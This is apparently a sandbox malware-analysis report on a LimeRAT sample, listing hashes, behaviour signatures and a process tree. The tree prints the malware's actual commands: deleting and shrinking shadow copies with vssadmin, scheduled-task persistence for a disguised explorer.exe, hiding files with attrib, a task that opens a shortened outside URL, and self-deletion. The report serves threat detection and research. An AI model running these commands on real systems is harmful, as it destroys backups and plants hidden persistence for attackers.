Analysis

  • max time kernel
    64s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2022 18:11

General

  • Target

    HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe

  • Size

    164KB

  • MD5

    df0b023471306ceb44a253d7cfd86abc

  • SHA1

    36b498e04a1777bbea6582f9d1a0820f96cabe97

  • SHA256

    297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0

  • SHA512

    2334f5dad874d44b7180241247f959d36b5d58fe8625c2b5013dd6bd751998a5ad9055b3c5255b95cb8a05eda2a06f566ab77bd45a54bd6923588c05b76e956c

  • SSDEEP

    3072:/I/0W2G4b/gFbGbj2koc34mwAEoznq1vK7rbKO5oqoO0MhwNz:/RjG40RGb3X34Hknq1cm20NN

Malware Config

Signatures

  • Contains code to disable Windows Defender 3 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 17 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Interacts with shadow copies 2 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe
    "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2412
    • C:\Windows\SYSTEM32\schtasks.exe
      schtasks /create /f /sc MINUTE /mo 26 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Roaming\Help\explorer.exe'"
      2⤵
      • Creates scheduled task(s)
      PID:4932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4880
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3932
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2460
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4852
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
        3⤵
        • Interacts with shadow copies
        PID:1464
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2452
      • C:\Windows\system32\vssadmin.exe
        vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        3⤵
          PID:4088
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:3660
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4588
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:1936
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:1036
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:864
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:1732
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:1132
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2248
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:2792
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c Vssadmin delete shadowstorage /all /quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5060
        • C:\Windows\system32\vssadmin.exe
          Vssadmin delete shadowstorage /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:1508
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:4244
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2556
        • C:\Windows\system32\vssadmin.exe
          vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
          3⤵
          • Enumerates connected drives
          • Interacts with shadow copies
          PID:3972
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help" & attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help\*" /S /D
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1328
        • C:\Windows\system32\attrib.exe
          attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help"
          3⤵
          • Views/modifies file attributes
          PID:4364
        • C:\Windows\system32\attrib.exe
          attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help\*" /S /D
          3⤵
          • Views/modifies file attributes
          PID:4916
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /C schtasks /create /f /st "08:16" /sc weekly /mo "13" /d "Tue" /tn "Microsoft-Windows-DiskDiagnosticResolver" /tr "'explorer'http://bit.ly/347IY80"
        2⤵
          PID:3936
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /st "08:16" /sc weekly /mo "13" /d "Tue" /tn "Microsoft-Windows-DiskDiagnosticResolver" /tr "'explorer'http://bit.ly/347IY80"
            3⤵
            • Creates scheduled task(s)
            PID:4432
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0.exe"
          2⤵
            PID:3512
            • C:\Windows\system32\PING.EXE
              ping 0 -n 2
              3⤵
              • Runs ping.exe
              PID:4540
          • C:\Users\Admin\AppData\Roaming\Help\explorer.exe
            "C:\Users\Admin\AppData\Roaming\Help\explorer.exe"
            2⤵
            • Modifies WinLogon for persistence
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4128
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /create /f /sc MINUTE /mo 26 /RL LIMITED /tn UpdateDMR /tr "'C:\Users\Admin\AppData\Roaming\Help\explorer.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:2896
            • C:\Windows\SYSTEM32\cmd.exe
              cmd /c attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help" & attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help\*" /S /D
              3⤵
                PID:412
                • C:\Windows\system32\attrib.exe
                  attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help"
                  4⤵
                  • Views/modifies file attributes
                  PID:3688
                • C:\Windows\system32\attrib.exe
                  attrib +H +S +R "C:\Users\Admin\AppData\Roaming\\Help\*" /S /D
                  4⤵
                  • Views/modifies file attributes
                  PID:1504
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 4128 -s 1828
                3⤵
                • Program crash
                PID:272
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3016
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -pss -s 436 -p 4128 -ip 4128
            1⤵
              PID:296

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Help\explorer.exe

              Filesize

              164KB

              MD5

              df0b023471306ceb44a253d7cfd86abc

              SHA1

              36b498e04a1777bbea6582f9d1a0820f96cabe97

              SHA256

              297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0

              SHA512

              2334f5dad874d44b7180241247f959d36b5d58fe8625c2b5013dd6bd751998a5ad9055b3c5255b95cb8a05eda2a06f566ab77bd45a54bd6923588c05b76e956c

            • C:\Users\Admin\AppData\Roaming\Help\explorer.exe

              Filesize

              164KB

              MD5

              df0b023471306ceb44a253d7cfd86abc

              SHA1

              36b498e04a1777bbea6582f9d1a0820f96cabe97

              SHA256

              297dbbb1daca4b23893b034ab20b8afd0de7664705f064dbbc7fd1d217b5fae0

              SHA512

              2334f5dad874d44b7180241247f959d36b5d58fe8625c2b5013dd6bd751998a5ad9055b3c5255b95cb8a05eda2a06f566ab77bd45a54bd6923588c05b76e956c

            • memory/2412-176-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

              Filesize

              10.8MB

            • memory/2412-132-0x000001B58B170000-0x000001B58B19E000-memory.dmp

              Filesize

              184KB

            • memory/2412-135-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

              Filesize

              10.8MB

            • memory/2412-133-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

              Filesize

              10.8MB

            • memory/4128-184-0x0000023C19A30000-0x0000023C19A34000-memory.dmp

              Filesize

              16KB

            • memory/4128-187-0x0000023C19A3C000-0x0000023C19A41000-memory.dmp

              Filesize

              20KB

            • memory/4128-179-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

              Filesize

              10.8MB

            • memory/4128-186-0x0000023C19A37000-0x0000023C19A3C000-memory.dmp

              Filesize

              20KB

            • memory/4128-183-0x0000023C191BA000-0x0000023C191BF000-memory.dmp

              Filesize

              20KB

            • memory/4128-177-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

              Filesize

              10.8MB

            • memory/4128-185-0x0000023C19A34000-0x0000023C19A37000-memory.dmp

              Filesize

              12KB

            • memory/4128-188-0x0000023C19A46000-0x0000023C19A4B000-memory.dmp

              Filesize

              20KB

            • memory/4880-137-0x00000246FDDE0000-0x00000246FDE02000-memory.dmp

              Filesize

              136KB

            • memory/4880-138-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

              Filesize

              10.8MB

            • memory/4880-139-0x00007FF833AC0000-0x00007FF834581000-memory.dmp

              Filesize

              10.8MB